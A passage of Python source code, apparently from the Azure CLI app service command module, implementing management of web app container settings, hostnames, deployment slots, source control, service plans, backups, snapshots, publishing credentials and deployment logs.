settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=_normalize_sku(sku), capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
